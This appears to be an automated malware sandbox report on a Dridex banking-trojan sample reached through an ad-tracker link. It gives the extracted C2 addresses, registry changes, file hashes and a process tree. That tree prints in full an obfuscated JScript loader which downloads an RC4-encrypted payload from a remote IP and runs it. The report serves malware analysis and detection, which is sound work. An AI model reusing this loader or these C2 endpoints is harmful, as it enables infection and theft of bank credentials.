dridex | hxxps://traffic[.]selfadtracker1[.]online/cryptopayself?cpm_id=428062182&cpm_cost=0[.]001

General

Target

https://traffic.selfadtracker1.online/cryptopayself?cpm_id=428062182&cpm_cost=0.001

Score

10^/10

dridex 10111 botnet

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

103.70.29.165:443

202.28.80.101:7443

91.121.146.47:10443

175.126.176.79:9676

rc4.plain

Signatures

Dridex
Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.
botnet dridex
Blocklisted process makes network request 1 IoCs

Processes:

wscript.exe

flow pid process

33 1076 wscript.exe
Executes dropped EXE 1 IoCs

Processes:

1v1c7.exe

pid process

3732 1v1c7.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
33	1076	wscript.exe

pid	process
3732	1v1c7.exe

Modifies Internet Explorer settings 1 TTPs 24 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3902948879"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{12F8EE64-65F9-11EC-9231-6AA886151C16} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "346825186"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30931461"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\FlipAhead	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "346205653"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3902948879"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30931461"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "346205484"	iexplore.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

iexplore.exe

pid process

2648 iexplore.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

2648 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

2648 iexplore.exe
2648 iexplore.exe
640 IEXPLORE.EXE
640 IEXPLORE.EXE
640 IEXPLORE.EXE
640 IEXPLORE.EXE

pid	process
2648	iexplore.exe

pid	process
2648	iexplore.exe

pid	process
2648	iexplore.exe
2648	iexplore.exe
640	IEXPLORE.EXE
640	IEXPLORE.EXE
640	IEXPLORE.EXE
640	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

iexplore.exeIEXPLORE.EXEcmd.exewscript.execmd.exe

description	pid	process	target process
PID 2648 wrote to memory of 640	2648	iexplore.exe	IEXPLORE.EXE
PID 2648 wrote to memory of 640	2648	iexplore.exe	IEXPLORE.EXE
PID 2648 wrote to memory of 640	2648	iexplore.exe	IEXPLORE.EXE
PID 640 wrote to memory of 2600	640	IEXPLORE.EXE	cmd.exe
PID 640 wrote to memory of 2600	640	IEXPLORE.EXE	cmd.exe
PID 640 wrote to memory of 2600	640	IEXPLORE.EXE	cmd.exe
PID 2600 wrote to memory of 1076	2600	cmd.exe	wscript.exe
PID 2600 wrote to memory of 1076	2600	cmd.exe	wscript.exe
PID 2600 wrote to memory of 1076	2600	cmd.exe	wscript.exe
PID 1076 wrote to memory of 1416	1076	wscript.exe	cmd.exe
PID 1076 wrote to memory of 1416	1076	wscript.exe	cmd.exe
PID 1076 wrote to memory of 1416	1076	wscript.exe	cmd.exe
PID 1416 wrote to memory of 3732	1416	cmd.exe	1v1c7.exe
PID 1416 wrote to memory of 3732	1416	cmd.exe	1v1c7.exe
PID 1416 wrote to memory of 3732	1416	cmd.exe	1v1c7.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://traffic.selfadtracker1.online/cryptopayself?cpm_id=428062182&cpm_cost=0.001
1⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2648

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2648 CREDAT:82945 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:640

C:\Windows\SysWOW64\cmd.exe
cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "htEL5N9d" "http://45.138.27.64/?NTU1MTAz&aHfgxqQ&cxssdvxcv=70wball.109qt74.406z8z7w8&ogfhghgn4=wnnQMvXcLxXQFYPCJf7cT&fhfghddfsdf=twix&dsfdfg43t=6NDKUfYGViJz5Gc3fqSCZn9JHT11tzUSkr16B2aCl_h9KB_L-AGOgHljhSCLwdjnYgLVVsapvqoiUeBwBGdiMSK_kSPaQNG-KKTFLYLhR32yoE&sdfsdfdfg=twix&WUTMTc2MzQ=" "2"
3⤵
- Suspicious use of WriteProcessMemory
PID:2600

C:\Windows\SysWOW64\wscript.exe
wsCripT //B //E:JScript 3.tMp "htEL5N9d" "http://45.138.27.64/?NTU1MTAz&aHfgxqQ&cxssdvxcv=70wball.109qt74.406z8z7w8&ogfhghgn4=wnnQMvXcLxXQFYPCJf7cT&fhfghddfsdf=twix&dsfdfg43t=6NDKUfYGViJz5Gc3fqSCZn9JHT11tzUSkr16B2aCl_h9KB_L-AGOgHljhSCLwdjnYgLVVsapvqoiUeBwBGdiMSK_kSPaQNG-KKTFLYLhR32yoE&sdfsdfdfg=twix&WUTMTc2MzQ=" "2"
4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1076

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c 1v1c7.exe
5⤵
- Suspicious use of WriteProcessMemory
PID:1416

C:\Users\Admin\AppData\Local\Temp\1v1c7.exe
1v1c7.exe
6⤵
- Executes dropped EXE
PID:3732

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\FMCQ93PW.cookie
MD5
b5fa0e17f099f75c6e9994bd5d8c32b7

SHA1
78f208dcbd85e425e1560730f430e0165305f3d8

SHA256
a84474168c825f77dbebef9e93d07449992b36b3b9cc4b6ade026af3c60720b3

SHA512
9cecb304defecf1c7874dfa0065706f14a0395d653166312c7e3f83934e7950880bf481707764ebae186c45ab2ceead66c8d63f66b9b686e5a8e510df2b4c2dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\1v1c7.exe
MD5
515d6a519e973233bea664fe3c506f29

SHA1
fbe48ff896010ec80ed74c4873ec7d9fd7482d5f

SHA256
32e6e47a0ce602b3f6cd5d9737694eb82bf1b20f4ebd4795ce283683178cec9a

SHA512
8733d1c8dd02d0d12ac3f6f8da10453409f634898eadbfc4675f3d6fbe35e0eb904013b945fa74f10defe9c01cf5a9bacb87a9774695e6396fc5850ceb4168e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\1v1c7.exe
MD5
515d6a519e973233bea664fe3c506f29

SHA1
fbe48ff896010ec80ed74c4873ec7d9fd7482d5f

SHA256
32e6e47a0ce602b3f6cd5d9737694eb82bf1b20f4ebd4795ce283683178cec9a

SHA512
8733d1c8dd02d0d12ac3f6f8da10453409f634898eadbfc4675f3d6fbe35e0eb904013b945fa74f10defe9c01cf5a9bacb87a9774695e6396fc5850ceb4168e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\3.tMp
MD5
60fc00422b399db85f87d41b8328976d

SHA1
bb85034acad8025f97e5bb236443debaf8926e4b

SHA256
c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

SHA512
16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

Download Submit
memory/640-140-0x0000000000000000-mapping.dmp

Download
memory/1076-169-0x0000000000000000-mapping.dmp

Download
memory/1416-171-0x0000000000000000-mapping.dmp

Download
memory/2600-168-0x0000000000000000-mapping.dmp

Download
memory/2648-131-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-157-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-127-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-128-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-129-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-115-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-132-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-133-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-135-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-136-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-137-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-138-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-124-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-142-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-141-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-144-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-145-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-147-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-149-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-150-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-151-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-155-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-156-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-125-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-163-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-164-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-165-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-166-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-167-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-123-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-122-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-121-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-120-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-116-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-119-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-117-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-188-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-187-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-177-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-178-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-182-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-183-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/2648-186-0x00007FF8AD160000-0x00007FF8AD1CB000-memory.dmp

Filesize
428KB

Download
memory/3732-176-0x0000000000400000-0x0000000000492000-memory.dmp

Filesize
584KB

Download
memory/3732-175-0x00000000020C0000-0x00000000020FC000-memory.dmp

Filesize
240KB

Download
memory/3732-172-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing